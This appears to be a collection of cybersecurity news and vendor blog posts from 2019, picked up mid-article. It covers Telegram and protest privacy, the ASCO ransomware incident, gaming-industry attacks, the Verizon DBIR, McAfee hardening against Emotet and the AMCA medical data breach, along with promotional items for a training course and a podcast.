Telegram has played a key role in the organization of the protests as it allows the creation of groups for up to 200,000 people or to create channels for broadcasting to unlimited audiences. Moreover, it is seen as a secure way to communicate and avoid China’s strict surveillance regime as it allows encryption of messages. The South China Morning Post points out that though news about the current protests is being shared over Facebook and Twitter, much of the sensitive information sharing and coordination is done using Telegram and Signal. The report also says that the public is now more concerned about privacy especially after the Facebook data breach by Cambridge Analytica and the fast development of big data and surveillance technology in the mainland.

The South China Morning Post quotes Lokman Tsui, a professor at Chinese University researching media and technology, as saying, “People are smarter around technology now. They are using tech in a way that doesn’t give you away.” The report adds that according to Professor Lokman Tsui, some apps, including Telegram, are not safe as protestors assume them to be. He points out that messages over Telegram are not encrypted by default and that most people don’t know that they have to actually turn on the encryption feature.

Also, Read:

How Companies Fight DDoS Attacks?

How to Protect Businesses Against DDoS Attacks

The post Telegram Recovers from DDoS Attack appeared first on .

Employees Out of Work after ASCO Hit by Ransomware

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time....As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization."

Gaming’s All Fun and Games Till Someone Gets Hacked

Gaming's All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR).

43% of breaches in 2018 involved small businesses. Hackers know you’re vulnerable and they’re acting on it.

We’re big fans of the DBIR over here, not just because we’re contributing partners and want to see our name in lights. Yes, we’re certainly guilty of initially jumping into the contributor section and searching for our logo, but after that, we devour the data. The report in itself is an easy read, and there is also a DBIR executive summary available for those that want a short overview.

At GRA Quantum, we’re experts at developing tailored security solutions for small organizations facing big threats —and the data in this year’s DBIR show that the threats facing these orgs are only growing. 43% of breaches in 2018 involved small businesses. And that makes sense, when you take the threat actors’ POV into account. Nefarious attackers know that small and mid-size businesses don’t have the cyber hygiene that’s expected of enterprise organizations. Yet, the personally identifiable information (PII) and the intellectual property of smaller organizations is just as valuable.

It’s not all bad news.

As more organizations, especially in the small and mid-size range, move to the cloud, hackers shift their focus to the cloud too. The DBIR showed an increase in hackers’ focus to cloud-based servers. Where’s the good news in this? Much of this hacking stems from stolen credentials AND can be prevented with better education amongst staff, paired with anti-phishing technology and managed security services. All affordable options for companies that don’t have hundreds or thousands of endpoints.

More good news: you can start protecting your small org today by implementing some cybersecurity best practices. We’ve developed a checklist to strengthen your cybersecurity program that can get you started. It’s more straightforward than you may anticipate, and you don’t have to be technical or in a security role to kick-off the initiative. In fact, the list was created for management in Human Resources and Finance departments. Items in the list that are easiest to implement include:

  • Enforcing a policy to require multi-factor authentication (MFA) to access all company systems
  • Creating an onboarding and offboarding policy, integrating HR and IT activities
  • Developing a third-party vendor risk management program
 Start taking this proactive approach to get ahead of the threats and strengthen your security stance today.


The post Small and Mid-size Orgs: Take Notice of this Trend in the 2019 Verizon Data Breach Investigations Report (DBIR). appeared first on GRA Quantum.

Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware

Customers often ask us how to implement the suggestions provided in our blogs and threat advisories to better protect their environments. The goal of this blog is to do just that.

By showing you how to better use our products, you’ll be able to protect against Emotet and other malware. Emotet is a Trojan downloader spread by malicious spam campaigns using JavaScript, VBScript, and Microsoft Office macro functions. It downloads additional malware and persists on the machine as a service. Emotet has been observed to download ransomware, mass-mailing worms, W32/Pinkslipbot, W32/Expiro, W32/Dridex, and banking Trojans.

NOTE: Always test changes prior to implementing them in your environment.

1. DATs and product updates

One of the most common issues seen while in Support was an outdated DAT.

2. Make sure you have at least one scheduled product update task in McAfee ePO to run daily.

3. On-Access Scan (OAS) configuration for McAfee Endpoint Security and McAfee VirusScan Enterprise

Ensure that On-Access Scan (OAS) is enabled and set to scan on read and write and that entire drives aren’t excluded from being scanned. McAfee Endpoint Security and McAfee VirusScan Enterprise allow you to configure different scan settings based on the process. You can enable “Configure different settings for High-Risk and Low-Risk processes” to improve performance and reduce the need for file/folder exclusions. See KB88205 for more information.

Be sure that Artemis/GTI is enabled and that the first scanner action is “Clean” and the second action is “Delete”.

NOTE: Setting Artemis/GTI to High or Very High should be done gradually and with testing to reduce the risk of false positives. See KB53735 for more information.

4. On-Demand Scan (ODS)

A weekly On-Demand Scan (ODS) is suggested to ensure that your systems don’t have malware or PUPs. Do not run an ODS during peak business hours, as users may complain about system performance.

5. Access Protection (AP)

While the default Access Protection (AP) rules provide decent coverage, both McAfee Endpoint Security and McAfee VirusScan Enterprise allow for the creation of user-defined rules to prevent infection and the spread of worms or viruses. Below are some pre-created ones that should be tested and enabled in your environment to provide additional protection.

Pre-Defined Rule:

  • Disabling Registry Editor and Task Manager — Certain malware may attempt to disable the Task Manager to prevent the user from terminating the malicious process. Enable this AP rule to prevent the Task Manager from being disabled.

6. Access Protection (AP) rules for virus and worm outbreaks

These rules should only be enabled during a virus outbreak and for workstations only. Implementing the last two shown below may cause issues with file servers running McAfee VirusScan Enterprise or McAfee Endpoint Security. Always test these rules before you enable them:

  • Remotely Creating Autorun Files
  • Remotely Creating or Modifying Files or Folders
  • Remotely Accessing Local Files or Folders

NOTE: Only create a separate AP policy for workstations if you wish to continue using the AP rules below. Remotely creating files between workstations is unusual behavior.

7. User-defined AP file/folder patch locations

The user-defined rule below is one common location for malware.

8. Microsoft Office malware

Most threats come through email and are often downloaders for other malware. The AP rule below is intended to prevent Microsoft Office applications from executing PowerShell. You can include CScript.exe and WScript.exe as well.

9. McAfee Endpoint Security firewall

Almost all organizations have a firewall at the perimeter level. Some may opt to disable the built-in firewall on workstations and servers. The McAfee Endpoint Security Firewall is more comprehensive than the Windows firewall and can be used to prevent communication to malicious IPs and domains.

10. Blocking malicious traffic with the firewall

Blocking malicious network traffic prevents new variants from being downloaded and can minimize the impact on the environment. Environments that don’t block malicious traffic as one of the first steps often take longer to clean up.

The post Leveraging McAfee Endpoint Security to Protect Against Emotet and Other Malware appeared first on McAfee Blogs.

AGs Warn ACMA Breach Impact Rose to over 20 Million

AGs Warn ACMA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed during the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorney generals (AGs) in such states as New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

Win the war against cyber crime with our cyber security boot camp

Cyber attacks are stronger and more prevalent than ever, wearing organisations down until attackers locate and exploit points of weakness.

For most organisations, it’s only a matter of time before the enemy breaches their defences. And with the cost of data breaches soaring and the potential for large fines under the GDPR (General Data Protection Regulation), you need to be prepared to fight back.

You can gain the necessary skills and learn the right tactics to lead your organisation’s charge by enlisting in our five-week boot camp.

Are you armed to defend your organisation from cyber attacks?

Take our test to find out >>

As part of your training regimen, you’ll receive weekly emails describing the steps you must take to secure your organisation and repel enemy forces. They will instruct you on how to:

  1. Cover the basics

Your first task will be to shield your organisation against the most urgent threats with the help of the Cyber Essentials scheme. Backed by the UK government, the scheme identifies essential measures that can secure the majority of weaknesses.

  1. Drill your troops

Help your employees understand the threats they face with the help of regular staff awareness training. An effective training course will help them navigate threats more carefully, avoiding costly mistakes and tackling threats appropriately.

  1. Identify your weaknesses

Do your defences work as intended? You don’t want to wait until you come under attack to find out. That’s why you need to appoint someone who’ll view your defences in the same way an attacker would, identifying areas that can be exploited.

  1. Guard your critical assets

Perimeter defences aren’t enough when it comes to your most sensitive data. You must therefore review risks to critical assets and develop policies and processes to ensure someone is always keeping an eye on them.

  1. Fortify your processes

So far, so good, but now isn’t the time to get complacent. Attackers will keep coming back, armed with the knowledge of their previous battles. That’s why you must regularly review and update your defence strategy to stay one step ahead of the enemy.

Are you ready to fight back?

You can find out more about our strategy for defending your organisation by enlisting in our boot camp.

Those who sign up will receive a free copy of The Cyber Security Combat Plan, as well as weekly emails containing in-depth advice on how to complete each task.

Enlist now >>

Cyber Security boot camp

The post Win the war against cyber crime with our cyber security boot camp appeared first on IT Governance Blog.

Episode 514 – Avoide Those Free USB Charging Hubs

As you travel around you may come across free charging stations for your mobile devices, USB cables ready to go. This episode talks about why you should think twice about using them. Be aware, be safe. Become A Patron! Pateron Page *** Support the podcast with a cup of coffee *** – Ko-Fi Security In […]

The post Episode 514 – Avoide Those Free USB Charging Hubs appeared first on Security In Five.